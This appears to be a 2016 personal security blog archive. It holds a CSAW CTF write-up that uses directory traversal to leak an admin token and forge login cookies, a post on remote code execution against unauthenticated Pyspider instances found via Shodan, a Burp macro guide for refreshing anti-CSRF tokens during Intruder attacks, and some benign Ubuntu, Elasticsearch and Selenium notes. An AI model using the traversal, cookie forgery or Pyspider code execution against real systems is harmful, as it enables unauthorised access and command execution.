Tuesday, September 20, 2016

[Writeup] CSAW CTF 2016

mfw (125)
This is the main URL:

Fuzzing it is easy:

Play with the flag:

wtf.sh 1 (150)

Register an account and log in.
Create a post, view the post.
Fuzzing the post viewer, I found a directory traversal (WTF? traversal again).
When I fuzzed http://web.chal.csaw.io:8001/post.wtf?post=zabOA/../../ I got some source code back. I guessed it might be possible to read every file in that directory, like cat * :)).

I found some interesting functions (after running the leaked source through a decoder so the code is readable):

function hash_password {
    local password=$1;
    (shasum <<< ${password}) | cut -d\  -f1;
}

# hash usernames for lookup in the users_lookup table
function hash_username {
    local username=$1;
    (shasum <<< ${username}) | cut -d\  -f1;
}

# generate a random token, base64 encoded
# on GNU base64 wraps at 76 characters, so we need to pass --wrap=0
function generate_token {
    (head -c 64 | (base64 --wrap=0 || base64)) < /dev/urandom 2> /dev/null;
}

So the username and password are SHA-1 hashed (shasum defaults to SHA-1, and the here-string appends a newline before hashing) and the token is 64 random bytes, base64 encoded. OK.
Next function:

function find_user_file {
    local username=$1;
    local hashed=$(hash_username "${username}"); # my note: for admin this is 4015bc9ee91e437d90df83fb64fbbe312d9c9f05, so the lookup dir is users_lookup/4015bc9ee91e437d90df83fb64fbbe312d9c9f05/ (it also holds the admin's posts file)
    local f;
    if [[ -n "${username}" && -e "users_lookup/${hashed}" ]]
    then
        echo "users/$(cat "users_lookup/${hashed}/userid")";
        # for admin this expands to:
        # echo "users/$(cat "users_lookup/4015bc9ee91e437d90df83fb64fbbe312d9c9f05/userid")";
    else
        echo "NONE"; # our failure case -- ugly but w/e...
    fi
}
function create_user {
    local username=$1;
    local password=$2;
    local hashed_pass=$(hash_password ${password});
    local hashed_username=$(hash_username "${username}");
    local token=$(generate_token);
    mkdir users 2> /dev/null; # make sure users directory exists
    touch users/.nolist; # make sure that the users dir can't be listed
    touch users/.noread; # don't allow reading of user files directly
    mkdir users_lookup 2> /dev/null; # make sure the username -> userid lookup directory exists
    touch users_lookup/.nolist; # don't let it be listed
    local user_id=$(basename $(mktemp users/XXXXX));

    # user files look like:
    #   username
    #   hashed_pass
    #   token
    echo "${username}" > "users/${user_id}";
    echo "${hashed_pass}" >> "users/${user_id}";
    echo "${token}" >> "users/${user_id}";

    mkdir "users_lookup/${hashed_username}" 2> /dev/null;
    touch "users_lookup/${hashed_username}/.nolist"; # lookup dir for this user can't be readable
    touch "users_lookup/${hashed_username}/.noread"; # don't allow reading the lookup dir
    touch "users_lookup/${hashed_username}/posts"; # lookup for posts this user has participated in
    echo "${user_id}" > "users_lookup/${hashed_username}/userid"; # create reverse lookup
    echo ${user_id};
}


After creating a user, the user has a random 5-character id like 2KP1G (from mktemp users/XXXXX), and the username, hashed password and token are stored in users/${user_id}, one per line.
Using the path traversal we can list that directory and read each file, so we have the admin token and hashed password. Of course, the hash is not going to be crackable =]]
URL: http://web.chal.csaw.io:8001/post.wtf?post=zabOA/../../../users

Posted by admin

Now, notice this part of the profile page (in .wtf templates, lines starting with $ are executed as shell):
$ if contains 'user' ${!URL_PARAMS[@]} && file_exists "users/${URL_PARAMS['user']}"
$ then
$   local username=$(head -n 1 users/${URL_PARAMS['user']});
$   echo "<h2>${username}'s posts:</h2>";
$   echo "<ul>";
$   get_users_posts "${username}" | while read -r post; do
$       post_slug=$(awk -F/ '{print $2 "#" $3}' <<< "${post}");
$       echo "<li><a href=\"/post.wtf?post=${post_slug}\">$(nth_line 2 "${post}" | htmlentities)</a></li>";
$   done
$   echo "</ul>";
$   if is_logged_in && [[ "${COOKIES['USERNAME']}" = 'admin' ]] && [[ ${username} = 'admin' ]]
$   then
$       get_flag1
$   fi
$ fi

Oh, we don't need the admin password at all: we need the cookies to say admin (easy) and is_logged_in to pass for admin. Find that function:
function is_logged_in {
    contains 'TOKEN' ${!COOKIES[@]} && contains 'USERNAME' ${!COOKIES[@]};
    local has_cookies=$?
    local userfile=$(find_user_file ${COOKIES['USERNAME']});
    [[ ${has_cookies} \
        && ${userfile} != 'NONE' \
        && $(tail -n1 ${userfile} 2>/dev/null) = ${COOKIES['TOKEN']} \
        && $(head -n1 ${userfile} 2>/dev/null) = ${COOKIES['USERNAME']} \
    ]];
    return $?;
}
The cookie is the token, and we already have the admin token from the traversal; the password hash on line 2 of the user file is never consulted. Two details of this check are worth knowing: has_cookies holds the string "0" or "1", and [[ ${has_cookies} && ... ]] only tests that string for non-emptiness, so the cookie-presence check is always true; and the right-hand sides of = inside [[ ]] are unquoted, so bash treats the cookie values as glob patterns rather than literal strings. Neither matters here. Change the USERNAME and TOKEN cookies to admin's values, refresh, and go to the profile:
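The pieces above, modelled in Python as an added example (my code, not the challenge's wtf.sh): it recreates the users/ and users_lookup/ layout from create_user, the username lookup and the is_logged_in check, then logs in with the two cookies read straight out of a leaked user file. The token, user id and password are constructed; note the "\n" in the hashes, because shasum <<< "$x" hashes the value followed by a newline.

```python
import hashlib
import os
import tempfile


def hash_username(username):
    """shasum <<< "$username": SHA-1 of the value plus the newline the here-string adds."""
    return hashlib.sha1((username + "\n").encode()).hexdigest()


def hash_password(password):
    return hashlib.sha1((password + "\n").encode()).hexdigest()


def create_user(root, username, password, token, user_id):
    """Same layout as create_user above: users/<id> holds username, hashed_pass,
    token (one per line); users_lookup/<sha1(username)>/userid maps back to <id>."""
    users = os.path.join(root, "users")
    lookup = os.path.join(root, "users_lookup", hash_username(username))
    os.makedirs(users, exist_ok=True)
    os.makedirs(lookup, exist_ok=True)
    with open(os.path.join(users, user_id), "w") as f:
        f.write(f"{username}\n{hash_password(password)}\n{token}\n")
    with open(os.path.join(lookup, "userid"), "w") as f:
        f.write(f"{user_id}\n")
    return user_id


def find_user_file(root, username):
    """Mirror of find_user_file: users/<id> for a known username, else "NONE"."""
    if not username:
        return "NONE"
    userid_path = os.path.join(root, "users_lookup", hash_username(username), "userid")
    if not os.path.exists(userid_path):
        return "NONE"
    with open(userid_path) as f:
        return os.path.join("users", f.read().strip())


def is_logged_in(root, cookies):
    """Mirror of is_logged_in: first line must equal USERNAME, last line must
    equal TOKEN. The password hash on line 2 is never consulted."""
    if "TOKEN" not in cookies or "USERNAME" not in cookies:
        return False
    userfile = find_user_file(root, cookies["USERNAME"])
    if userfile == "NONE":
        return False
    with open(os.path.join(root, userfile)) as f:
        lines = f.read().splitlines()
    return lines[0] == cookies["USERNAME"] and lines[-1] == cookies["TOKEN"]


def cookies_from_leaked_user_file(text):
    """What the traversal hands you: turn a users/<id> file into the two cookies."""
    lines = text.splitlines()
    return {"USERNAME": lines[0], "TOKEN": lines[2]}


def demo():
    """Create an admin the way the challenge would, 'leak' its user file, then log in
    with the leaked token and with a wrong one. Returns (forged_ok, wrong_token_ok)."""
    root = tempfile.mkdtemp()
    token = "Zm9yZ2VkLXRva2VuLWZvci10aGlzLWRlbW8tb25seQ=="  # constructed, not generate_token output
    create_user(root, "admin", "password-we-never-need", token, "2KP1G")
    # the attacker reads users/2KP1G through the traversal (post=zabOA/../../../users/...)
    with open(os.path.join(root, "users", "2KP1G")) as f:
        leaked = f.read()
    forged = cookies_from_leaked_user_file(leaked)
    wrong = {"USERNAME": "admin", "TOKEN": "not-the-token"}
    return is_logged_in(root, forged), is_logged_in(root, wrong)


if __name__ == "__main__":
    print(demo())
```

The only secret the check ever compares against is the last line of the user file, so a directory traversal that can read users/ is equivalent to a credential leak for every account.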

Flag: flag{l00k_at_m3_I_am_th3_4dm1n_n0w}

I Got Id (200)
Thanks to Acunetix :)).
After a scan, I had this bug:

I tried many file paths, but it was too easy :|

Thanks for reading
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be continued - I will update more.

Tuesday, September 6, 2016

RCE in Pyspider

Today I read an article about exploiting debug mode in Werkzeug. It's old, but very interesting. When I searched Shodan, I found about 30 websites running pyspider. Pyspider is an open-source Python web crawler; you can download and install it from: https://github.com/binux/pyspider
It has one problem: no authentication. Anyone who can reach the web UI can use it. (pyspider's webui component does support --need-auth with --username and --password; these instances were simply started without it.)

When you click a project, you get to the debug mode, where you can edit the project's Python script and run it. So you can use it to execute arbitrary code on the server. It is RCE.

This is my POC (pasted into the script editor and run from the debugger; the command runs with the privileges of the pyspider process):
import subprocess

# run a command under the pyspider process and capture its output
p = subprocess.Popen(["id"], stdout=subprocess.PIPE)
output, err = p.communicate()
print(output)


Monday, August 15, 2016

Install Skype and Facebook Messenger plugins for Pidgin on Ubuntu

On Windows it's easy to install the Facebook app and the Skype app. On Ubuntu I wanted one app for both services, so I chose Pidgin.
1. Install the Facebook plugin:
We use purple-facebook:
sudo sh -c "echo 'deb http://download.opensuse.org/repositories/home:/jgeboski/xUbuntu_$(lsb_release -rs)/ /' >> /etc/apt/sources.list.d/jgeboski.list"
cd /tmp && wget http://download.opensuse.org/repositories/home:/jgeboski/xUbuntu_$(lsb_release -rs)/Release.key
sudo apt-key add - < Release.key
sudo apt-get update
sudo apt-get install purple-facebook
Add your Facebook account in Manage Accounts.
2. Install the Skype plugin:
We use skypeweb:
sudo apt-get install libpurple-dev libjson-glib-dev cmake gcc
git clone git://github.com/EionRobb/skype4pidgin.git
cd skype4pidgin/skypeweb
mkdir build
cd build
cmake ..
cpack   # builds the .deb that the next step installs
sudo dpkg -i skypeweb-1.1.0-Linux.deb

Add your Skype account in Manage Accounts.


Saturday, July 23, 2016

Use macros to handle anti-CSRF tokens in Burp Suite

While reading a paper about Burp Suite tricks, I came across Burp Suite macros, which can be used to handle anti-CSRF tokens.
I tried it with this demo: http://www.businessinfo.co.uk/labs/csrf_defend/form_token_demo_stage2.php
The first request fetches the token embedded in the HTML (formtoken), and the POST request (request 2) sends it back to be checked.
Now we need a macro to fetch the token automatically and add it to the POST data.
Make sure both requests and their responses are in the proxy history, and that intercept is off.
Go to Project options (version > 1.7) or Options (<= 1.6, I'm not sure). I used the Pro version. Choose the Sessions tab. In Session handling rules, add a new rule:
Type your rule name, like "Anti CSRF Rule for xx.com". In Rule actions, choose Add with the type "Run a post-request macro". You see the action editor.

Add a new macro by clicking Add; the Macro Editor and Macro Recorder windows open.

Now, in the Macro Recorder you must choose the 2 requests: request 1 is the request that gets the token, and request 2 is the action request that uses the token (select both).

Click OK and the 2 requests are sent to the Macro Editor:

You can re-order the 2 requests: the "before" request is on top (number 1) and the "after" request is at the bottom (number 2). In many cases Burp can analyze the response and extract the parameter automatically. We can extract it manually with Configure item.
Click request 1, then Configure item. In "Configure macro item for ...", click Add. Now we can instruct Burp exactly which value to extract from the HTML, and give it a name (form_token):

Click OK and we see form_token under custom parameters. Click OK to return to the Macro Editor.
Select request 2 and click Configure item. In parameter handling, for formtoken select "Derive from prior response" and select response 1.
OK to return to the Macro Editor. You can test the macro here. OK to return to the session handling action editor. You can select "Update only the following parameters" and choose your parameter.
Make sure the final request in the macro is selected. Click OK to return to the Session handling rule editor.
Click the Scope tab and make sure the tools you need are ticked under Tools scope (Extender, Intruder, Repeater ...). In URL scope you can include all URLs or enter specific ones.

OK to return to Project options; we can see the new session handling rule and macro.
Now you can use this macro in your tools. To monitor and debug it, open the session tracer.

You can use it with Intruder (to run your payloads) or Repeater.
But it is only a macro, so you can only copy a value out of a prior response. If you need to extract a value and then compute something from it (bla bla), this trick can't do it. I think a new extension is needed for that.
Note: if you need to run the macro before the main request (like a login), choose "Run a macro" instead when adding the rule action.
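What the macro does, written out in Python as an added example (my code, not from the paper or from Burp): a constructed single-use-token server stands in for the demo page, derive_params copies only the named token out of the prior response the way "Derive from prior response" does, and the two functions at the end compare Intruder without a session rule (one token grabbed up front and reused, rejected after the first request) against the macro (a fresh GET before every POST). The form markup and token format are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlencode, parse_qs


class HiddenInputParser(HTMLParser):
    """Collect name/value of every <input type="hidden"> in a page."""

    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "input":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("type", "").lower() == "hidden" and a.get("name"):
            self.fields[a["name"]] = a.get("value", "")


def extract_hidden_fields(html):
    parser = HiddenInputParser()
    parser.feed(html)
    return parser.fields


def derive_params(prior_html, params, derived=("formtoken",)):
    """Burp's 'derive from prior response': only the listed parameters are
    overwritten from the macro response; everything else stays as sent."""
    fields = extract_hidden_fields(prior_html)
    out = dict(params)
    for name in derived:
        if name not in fields:
            raise ValueError(f"{name!r} not found in prior response")
        out[name] = fields[name]
    return out


class FakeCsrfServer:
    """Constructed stand-in for the form_token_demo page: every GET issues a
    fresh single-use token, and a POST is accepted only with that token."""

    def __init__(self):
        self.counter = 0
        self.valid = None

    def get_form(self):
        self.counter += 1
        self.valid = f"tok{self.counter:04d}"
        return ('<form method="post" action="/form_token_demo_stage2.php">'
                f'<input type="hidden" name="formtoken" value="{self.valid}">'
                '<input type="text" name="comment"><input type="submit"></form>')

    def post_form(self, body):
        sent = parse_qs(body).get("formtoken", [None])[0]
        ok = sent is not None and sent == self.valid
        self.valid = None  # the token is consumed whether or not it matched
        return 200 if ok else 403


def send_with_macro(server, params, token_name="formtoken"):
    """Macro item 1: GET the form. Item 2: POST with the token derived from it."""
    html = server.get_form()
    body = derive_params(html, params, (token_name,))
    return server.post_form(urlencode(body))


def replay_without_macro(server, params, n=3):
    """Intruder with no session rule: one token captured up front, then reused."""
    first = derive_params(server.get_form(), params)
    return [server.post_form(urlencode(first)) for _ in range(n)]


def attack_with_macro(server, payloads):
    """Intruder with the session rule: a fresh token before every payload."""
    return [send_with_macro(server, {"comment": p}) for p in payloads]


if __name__ == "__main__":
    print(replay_without_macro(FakeCsrfServer(), {"comment": "x"}))
    print(attack_with_macro(FakeCsrfServer(), ["a", "b", "c"]))
```

The limitation from the text shows up in derive_params: it can only copy a value it finds verbatim in the prior response. Anything that needs a transformation (hashing, concatenation, a second lookup) has to happen in code like this, as a session handling extension, not in a macro.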


Monday, June 27, 2016

Auto-mount partitions in Ubuntu with fstab

Before Ubuntu I had Windows installed, and I have 2 NTFS partitions. They are not auto-mounted; they only mount when I click the disk icon in the file manager.
I need them mounted automatically, because many applications on those partitions must be available.
First, find the UUID of each partition in /dev/disk/by-uuid (ls -l /dev/disk/by-uuid, or sudo blkid).
Then edit /etc/fstab and add:
UUID=327E4E257E4DE1E9   /mnt/sdb1/   ntfs   rw,auto,users,exec,nls=utf8,umask=003,gid=46,uid=1000   0   0
UUID=38D822D9D82294E2   /mnt/sdb2/   ntfs   rw,auto,users,exec,nls=utf8,umask=003,gid=46,uid=1000   0   0

UUID is the value I found, uid is the id of my user (id -u), and gid=46 is Ubuntu's plugdev group. The mount points must exist (sudo mkdir -p /mnt/sdb1 /mnt/sdb2), and sudo mount -a mounts everything without a reboot.
To add these locations to the sidebar, use "Bookmark this location" in GNOME Files.


Friday, June 24, 2016

Some experience from working with ElasticSearch and Angular

This week I joined a project that needs a web portal. My hobby is Python, so I chose Flask and Angular JS, with Bootstrap for the CSS template.
My DB is ElasticSearch. I don't make raw HTTP requests to query ES; I use the python elasticsearch lib.
Using ES, I had some problems.
1. Sort in ES:
            data = self.es.search(index=self.indexName, doc_type=self.docType,
                                  body={"query": {
                                            "filtered": {
                                                "query": {
                                                    "bool": {
                                                        "must": mustDict
                                                    }
                                                }
                                            }
                                        },
                                        "size": size, "from": from_,
                                        "sort": {"timestamp": {"order": "desc"}}})
(size, from and sort are top-level keys of the body, next to query, not inside it.)
2. AND/OR operator: use bool.
AND is must (OR is should). I created a list of must clauses (mustDict).
3. To make a RESTful API, I used flask_restful integrated with my Flask app. Coding is like web MVC: Blueprints for routing and controllers, which render HTML; the client calls the REST API to get data. Very simple.
4. Angular JS re-render:
I used the start-angular theme, which has a responsive table. All the data is in that table and is filled by Angular JS. But the responsive-table plugin must run after Angular has rendered. So I found a trick using a directive and setTimeout:

    function reFormatTable() {
        // (re)initialise the theme's responsive-table plugin on the rendered table;
        // the plugin call itself was lost when the page was extracted, only its option survived
        var tableOptions = {
            responsive: true
        };
        // pluginInit(tableElement, tableOptions);
    }

    var app = angular.module('myApp', [])
        .directive('myRepeatDirective', function () {
            return function (scope, element, attrs) {
                // runs once per ng-repeat row as Angular renders it
            };
        })
        .directive('myMainDirective', function () {
            return function (scope, element, attrs) {
                // give Angular time to finish rendering the rows, then re-format
                setTimeout(reFormatTable, 1000);
            };
        });
5. Call Angular functions in a template:
I like programming in the Angular template, so I need Angular's functions there. To map them:
        $scope.isObject = angular.isObject;
        $scope.isString = angular.isString;
        $scope.isDefined = angular.isDefined;
In HTML: ng-if="isObject(object)"
6. Find a string in a field:
When searching, I need to find a string inside one field. I tried regex and the * character without success. Finally, I found wildcard:
mustDict.append({"wildcard" : { "site" : { "value" : "*{0}*".format(sitename), "boost" : 2.0 }}})
This searches the site field for values containing sitename. I added it to mustDict. Note that sitename goes into the pattern unescaped, so a user-supplied * or ? is interpreted by Lucene as a wildcard, and a leading * forces a scan of every term in the field.
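Building the bodies from items 1, 2 and 6 safely, as an added example (my code, not the project's): escape_wildcard makes user input match literally, contains_clause is the "string in field" search, and build_body assembles the must/should bool query with size, from and sort at the top level. It uses the plain bool query rather than the filtered wrapper (deprecated in ES 2.0, removed in 5.0); backslash escaping follows Lucene's wildcard syntax, which I assume your ES version passes through unchanged. The es argument of site_search is the same elasticsearch-py client object as in the post.

```python
# Lucene wildcard metacharacters; backslash is Lucene's escape character
WILDCARD_META = "\\*?"


def escape_wildcard(term):
    """Escape *, ? and \\ so user input is matched literally inside a wildcard."""
    return "".join("\\" + c if c in WILDCARD_META else c for c in term)


def contains_clause(field, term, boost=2.0):
    """The post's 'string in field' search: *term* with the term escaped."""
    if not term:
        raise ValueError("empty term would become a bare '*' and match everything")
    return {"wildcard": {field: {"value": "*%s*" % escape_wildcard(term),
                                 "boost": boost}}}


def term_clause(field, value):
    return {"term": {field: value}}


def build_body(must=(), should=(), size=20, from_=0,
               sort_field="timestamp", order="desc"):
    """AND = must, OR = should. minimum_should_match=1 keeps an OR group from
    degrading to 'match everything'; size/from/sort sit beside query, not in it."""
    if size < 0 or from_ < 0:
        raise ValueError("size and from must be non-negative")
    bool_q = {"must": list(must)}
    if should:
        bool_q["should"] = list(should)
        bool_q["minimum_should_match"] = 1
    return {"query": {"bool": bool_q},
            "size": size, "from": from_,
            "sort": {sort_field: {"order": order}}}


def site_search(es, index, doc_type, sitename, size=20, from_=0):
    """Same call shape as the post's self.es.search(...), with a safe body."""
    body = build_body(must=[contains_clause("site", sitename)],
                      size=size, from_=from_)
    return es.search(index=index, doc_type=doc_type, body=body)
```

Leading wildcards stay expensive even when escaped; if the "contains" search is hot, an ngram-analysed copy of the site field with a match query is the usual replacement.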

Monday, June 6, 2016

Popup interaction in Selenium

While developing the AWATT tool, I hit this problem: after a click, a pop-up alert window appears and must be confirmed (accept or dismiss) before continuing.
You can't use Selenium's element selectors to control it. This is the solution:

from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

url = "http://www.javascripter.net/faq/alert.htm"
driver = webdriver.Firefox()
driver.get(url)
element = driver.find_element_by_xpath("//input[@type='button']")
element.click()                                        # this click raises the JavaScript alert()
WebDriverWait(driver, 5).until(EC.alert_is_present())  # wait for it instead of a fixed sleep
alert = driver.switch_to.alert                         # switch_to_alert() is the older, deprecated spelling
alert.accept()                                         # or alert.dismiss() to press Cancel
driver.quit()
